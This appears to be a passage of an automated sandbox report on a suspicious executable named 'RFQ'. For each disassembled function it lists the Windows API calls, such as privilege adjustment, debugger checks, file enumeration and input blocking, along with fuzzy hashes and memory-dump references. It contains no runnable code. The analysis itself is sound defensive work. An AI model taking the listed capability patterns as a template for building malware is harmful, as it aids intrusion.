                                                                            • API String ID: 234945975-0
                                                                            • Opcode ID: a50ffdb81fe24bf7b2942851342233063a8868926decf32f31a3710862fc3086
                                                                            • Instruction ID: 7463876c576123506db64a4786f1db8d2e0728128dc69bcab6b2834cd5f62557
                                                                            • Opcode Fuzzy Hash: a50ffdb81fe24bf7b2942851342233063a8868926decf32f31a3710862fc3086
                                                                            • Instruction Fuzzy Hash: AD218EB194070D9BD720DFA5C948BEAB7F9EF40324F108429E64692691E774EE05CB94
                                                                            Function 006EDADC Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(?,006C5DF8), ref: 006EDAEC
                                                                            • GetFileAttributesW.KERNEL32(?), ref: 006EDAFB
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 006EDB0C
                                                                            • FindClose.KERNEL32(00000000), ref: 006EDB18
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                            • String ID:
                                                                            • API String ID: 2695905019-0
                                                                            • Opcode ID: 74d9ea3209eb2d3ab18e531f7747aa9c9070bec710cbf5d056959b65c16aed6b
                                                                            • Instruction ID: 000eb85e4ab8fc4b36f76b556281a6937d72fda3fe22c9906be5b6c9fe5288c1
                                                                            • Opcode Fuzzy Hash: 74d9ea3209eb2d3ab18e531f7747aa9c9070bec710cbf5d056959b65c16aed6b
                                                                            • Instruction Fuzzy Hash: 11F0E572451B10AB921167BCAC0D8EA37BDAE01338B10C706F835C31F0E7785DA54699
                                                                            Function 006E81EE Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 568stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 006E8200
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen
                                                                            • String ID: ($|
                                                                            • API String ID: 1659193697-1631851259
                                                                            • Opcode ID: 0cd8b78d0ff84a471d8c0cc4757bd04488eb1ce4b8c00f9644532bbd357d637a
                                                                            • Instruction ID: fd712f5f835e8305a641ef00a817665b7cec34588372339ff8db40966569ec4a
                                                                            • Opcode Fuzzy Hash: 0cd8b78d0ff84a471d8c0cc4757bd04488eb1ce4b8c00f9644532bbd357d637a
                                                                            • Instruction Fuzzy Hash: 99325774A00B459FCB28CF59C081AAAB7F1FF48710B11C56EE59ADB3A1EB70E941CB44
                                                                            Function 006F5BB5 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 006F5BDF
                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 006F5C35
                                                                            • FindClose.KERNEL32(?), ref: 006F5C7D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$CloseFirstNext
                                                                            • String ID:
                                                                            • API String ID: 3541575487-0
                                                                            • Opcode ID: 821d7ca01bdfb8335388cb35aec85da0c38d3218e90993fb6cae7a0f23e9d7dd
                                                                            • Instruction ID: 71d483b2f59191f2edf3d51d67fed84407bd06e2bd518a43ea420942c1b0ba92
                                                                            • Opcode Fuzzy Hash: 821d7ca01bdfb8335388cb35aec85da0c38d3218e90993fb6cae7a0f23e9d7dd
                                                                            • Instruction Fuzzy Hash: 3D517A74604B059FC714DF28C490AAAB7E5FF4A314F14855DEA9B8B3A1CB31ED04CB91
                                                                            Function 006B25B2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 006B26AA
                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 006B26B4
                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 006B26C1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                            • String ID:
                                                                            • API String ID: 3906539128-0
                                                                            • Opcode ID: 1024de6f5b0ffdbbc4a3da153e820201abc9f4e283e07dae2d6894bd48c5d7a6
                                                                            • Instruction ID: 6b159fbcf345d2c419c3c5f6105d7fb1bc81efc3ecde61a983c4239f15cc73dd
                                                                            • Opcode Fuzzy Hash: 1024de6f5b0ffdbbc4a3da153e820201abc9f4e283e07dae2d6894bd48c5d7a6
                                                                            • Instruction Fuzzy Hash: 1F31D37494121D9BCB61DF68DC887DDBBB8AF08350F5081DAE41CA6261EB349FC58F49
                                                                            Function 006F50EB Relevance: 4.6, APIs: 3, Instructions: 76COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 006F50F8
                                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 006F5156
                                                                            • SetErrorMode.KERNEL32(00000000), ref: 006F51BF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$DiskFreeSpace
                                                                            • String ID:
                                                                            • API String ID: 1682464887-0
                                                                            • Opcode ID: d2467f231b313b4b904fddf94ab670e70114d9c5826420cccd8cbbc5f57f476b
                                                                            • Instruction ID: db136ba7232932f4c8c082bbb9ecd46fd9e1db79515662886cc8b3d19c17bb19
                                                                            • Opcode Fuzzy Hash: d2467f231b313b4b904fddf94ab670e70114d9c5826420cccd8cbbc5f57f476b
                                                                            • Instruction Fuzzy Hash: B1314C75A00518AFDB00DF54C884BEDBBB5FF08314F088099E9059B392DB35EC56CB95
                                                                            Function 006E1607 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0069FD5B: __CxxThrowException@8.LIBVCRUNTIME ref: 006A05E8
                                                                              • Part of subcall function 0069FD5B: __CxxThrowException@8.LIBVCRUNTIME ref: 006A0605
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006E1651
                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 006E167E
                                                                            • GetLastError.KERNEL32 ref: 006E168E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                            • String ID:
                                                                            • API String ID: 577356006-0
                                                                            • Opcode ID: 9819bd3938c338075f7631fcc0626c55f3ec59c531eb888c550aba4378b5de8d
                                                                            • Instruction ID: f6fdd08300995ac491b1e4186dfd3573e734c6a8a835585784a8a87e2196349d
                                                                            • Opcode Fuzzy Hash: 9819bd3938c338075f7631fcc0626c55f3ec59c531eb888c550aba4378b5de8d
                                                                            • Instruction Fuzzy Hash: 5A11CEB2414304AFD7189F64EC86EAAB7BDFF04710B24C52EF05697291EB70BC458A68
                                                                            Function 006ED509 Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 006ED526
                                                                            • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 006ED563
                                                                            • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 006ED56E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CloseControlCreateDeviceFileHandle
                                                                            • String ID:
                                                                            • API String ID: 33631002-0
                                                                            • Opcode ID: dbfb0c775aa8caae725df6afeb9238c4bc8f99e5d68af6d236c3008bff138357
                                                                            • Instruction ID: df195065872040c912809914ee9aa21d44bb56bf8040e73ffec70f8a3925c0ed
                                                                            • Opcode Fuzzy Hash: dbfb0c775aa8caae725df6afeb9238c4bc8f99e5d68af6d236c3008bff138357
                                                                            • Instruction Fuzzy Hash: 43115EB5E41228BFDB118F999C45FEFBBBDEB45B50F108121F914E7290D6704A058BA1
                                                                            Function 006E15A7 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 006E15D0
                                                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 006E15E5
                                                                            • FreeSid.ADVAPI32(?), ref: 006E15F5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                            • String ID:
                                                                            • API String ID: 3429775523-0
                                                                            • Opcode ID: ad833ba05d422cfb5ad1cd709215043d8dd38d57e2e8f31a070dc75b73f00225
                                                                            • Instruction ID: 333f56cdb1e281310144328a412f3aac7657aca1103ac9517e03a63381ea4367
                                                                            • Opcode Fuzzy Hash: ad833ba05d422cfb5ad1cd709215043d8dd38d57e2e8f31a070dc75b73f00225
                                                                            • Instruction Fuzzy Hash: 90F01771A9030DFBDF00DFE4DC89AEEBBBCFB08604F508565E601E2181E778AA449B54
                                                                            Function 006A4C78 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(00000003,?,006A4C4E,00000003,007488C8,0000000C,006A4DA5,00000003,00000002,00000000,?,006B2879,00000003), ref: 006A4C99
                                                                            • TerminateProcess.KERNEL32(00000000,?,006A4C4E,00000003,007488C8,0000000C,006A4DA5,00000003,00000002,00000000,?,006B2879,00000003), ref: 006A4CA0
                                                                            • ExitProcess.KERNEL32 ref: 006A4CB2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CurrentExitTerminate
                                                                            • String ID:
                                                                            • API String ID: 1703294689-0
                                                                            • Opcode ID: 66bcac705a92fca02f0a093f4434274184efa5c9e5dea3f5533e147c3f497ea9
                                                                            • Instruction ID: 09fe3d4a1c6b89211efcd1e4fe19b383978a964e6e04c1954e57dae701794ce9
                                                                            • Opcode Fuzzy Hash: 66bcac705a92fca02f0a093f4434274184efa5c9e5dea3f5533e147c3f497ea9
                                                                            • Instruction Fuzzy Hash: 09E09A71141148ABCB126F98DE09A983B6AEF85355B00C014F95A96262CB79DD41DF84
                                                                            Function 006DDA16 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetUserNameW.ADVAPI32(?,?), ref: 006DDA28
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: NameUser
                                                                            • String ID: X64
                                                                            • API String ID: 2645101109-893830106
                                                                            • Opcode ID: 991503b15a19c4f231a27c620bc296dfd47ec13aacc69b5575897b9cf7faab27
                                                                            • Instruction ID: b426df0cdfdcfcf8b2242410f70f8089b977857c4725cc7863b8bfdf6d2e7505
                                                                            • Opcode Fuzzy Hash: 991503b15a19c4f231a27c620bc296dfd47ec13aacc69b5575897b9cf7faab27
                                                                            • Instruction Fuzzy Hash: 37D0C9B480511DEACF80CB90EC88DD9777CBB08304F108152F106A2140DB7455498F10
                                                                            Function 006ACA30 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ebe32b9e9a0195b35bb6943144bf46fa156ca40a4ea5f4f8e36eb64e40b91145
                                                                            • Instruction ID: 0891d6e196b64e5875912673b1980b5142342f35a4b12a1a93fd81af5d59c195
                                                                            • Opcode Fuzzy Hash: ebe32b9e9a0195b35bb6943144bf46fa156ca40a4ea5f4f8e36eb64e40b91145
                                                                            • Instruction Fuzzy Hash: C6020A71E002199BDF14DFA9C8906ADBBF2EF89324F258169D919A7380D731AE418F94
                                                                            Function 0068E3F0 Relevance: 3.2, Strings: 2, Instructions: 659COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Variable is not of type 'Object'.$p#u
                                                                            • API String ID: 0-1908159134
                                                                            • Opcode ID: 38eb151cafbb8bc31ebc95b238246397163e3a9cc92af277510d111e4acfd603
                                                                            • Instruction ID: 05259ea0bb41f6fbb125a6ea7120134d6c5e527c2e5a1b4626472921cd58b12f
                                                                            • Opcode Fuzzy Hash: 38eb151cafbb8bc31ebc95b238246397163e3a9cc92af277510d111e4acfd603
                                                                            • Instruction Fuzzy Hash: 21329070D00218EBDF14EF90C994AEDB7B6BF16304F14425AE8066F392D776AE46CB61
                                                                            Function 006F680C Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 006F6836
                                                                            • FindClose.KERNEL32(00000000), ref: 006F687F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Find$CloseFileFirst
                                                                            • String ID:
                                                                            • API String ID: 2295610775-0
                                                                            • Opcode ID: 797fd5321d5e77700d049eaf54ceb5f0f37b8070714c0d3027909f9c9db87539
                                                                            • Instruction ID: 1540b4bed076a61460520bae7a87421cdb188eefcdd26ad7e25379d8ecb8b360
                                                                            • Opcode Fuzzy Hash: 797fd5321d5e77700d049eaf54ceb5f0f37b8070714c0d3027909f9c9db87539
                                                                            • Instruction Fuzzy Hash: FF11AF716042009FD710DF69C488A29BBE1BF85324F44C6ADF5258B3A2C734EC05CB91
                                                                            Function 006F36D3 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,007047B8,?,?,00000035,?), ref: 006F3702
                                                                            • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,007047B8,?,?,00000035,?), ref: 006F3712
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFormatLastMessage
                                                                            • String ID:
                                                                            • API String ID: 3479602957-0
                                                                            • Opcode ID: 46f0426728b98b95e46f17ac63282ea088c6683337b4d5acf756b30c8d6f098e
                                                                            • Instruction ID: 6c4d58c27b7d0b0f3038cdbf1ff9ba7a644076d250f695566856dd3585e85ccd
                                                                            • Opcode Fuzzy Hash: 46f0426728b98b95e46f17ac63282ea088c6683337b4d5acf756b30c8d6f098e
                                                                            • Instruction Fuzzy Hash: 60F0E5B02002292AE72066B99C4DFFB7A6FFFC5761F004169F905D22C1DA609D00C7B4
                                                                            Function 006E1003 Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,006E1140), ref: 006E1018
                                                                            • CloseHandle.KERNEL32(?,?,006E1140), ref: 006E102D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: AdjustCloseHandlePrivilegesToken
                                                                            • String ID:
                                                                            • API String ID: 81990902-0
                                                                            • Opcode ID: 969e922eb40c733537cf6ba47ea01c93753d8791d45314fc924c93f8684a96fa
                                                                            • Instruction ID: 0b08f26d5dfd688e47fa7488170fdd8a6d5ab8deada89f243b283225e58959df
                                                                            • Opcode Fuzzy Hash: 969e922eb40c733537cf6ba47ea01c93753d8791d45314fc924c93f8684a96fa
                                                                            • Instruction Fuzzy Hash: 8CE04F32004610EEEB262B55EC05EB277AEEF04310B25C82DF4A5848B1DF626C90DB18
                                                                            Function 006B66FB Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,00000000,?,00000008,?,?,006B66F6,00000000,?,00000008,?,?,006BFE9F,00000000), ref: 006B6928
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionRaise
                                                                            • String ID:
                                                                            • API String ID: 3997070919-0
                                                                            • Opcode ID: a82253ea63e98c0f8b401371684890d93e866b778af6f1731c6ad32cf6b4d6c5
                                                                            • Instruction ID: 2a379b12ee0e1b337242b5d1cc9a887196c2d51e87a4ff80187199af8fb36d54
                                                                            • Opcode Fuzzy Hash: a82253ea63e98c0f8b401371684890d93e866b778af6f1731c6ad32cf6b4d6c5
                                                                            • Instruction Fuzzy Hash: EFB14C715106099FD715CF28C48ABE47BE2FF45364F258658F899CF2A2C739E992CB40
                                                                            Function 006FE9C9 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • BlockInput.USER32(00000001), ref: 006FE9E4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
